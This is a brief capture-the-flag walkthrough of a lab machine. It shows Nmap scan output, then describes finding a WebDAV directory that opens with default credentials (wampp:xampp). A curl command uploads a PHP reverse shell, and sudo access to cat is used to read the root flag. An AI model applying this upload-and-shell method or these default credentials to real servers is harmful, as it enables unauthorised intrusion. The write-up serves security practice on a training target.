Nmap scan report for 10.10.67.204
Host is up (0.049s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/4%OT=80%CT=1%CU=36093%PV=Y%DS=2%DC=T%G=Y%TM=5F00AE53
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=2%ISR=10B%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11
OS:NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
So here we only have one port open which is strange and i havent encountered many machines like this after looking through the source code i found nothing and then i did some dirbusting and found out that there is a directory called webdav which is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operation. It was password protected but luckily it was default credentials so we found them easily and they were wampp:xampp. So in there we found a password file as well which had the password encyrpted. So then after looking around the webdav has a upload vulnerability and we can exploit that by uploading a reverse shell from pentestmonkey using the commands
curl http://<ip>/webdav/shell.php -u wampp:xampp --upload-file shell.php
and gg we have a shell as a user and can get the user flag and also we can run cat as root so we can cat out root/root.txt and get the flag.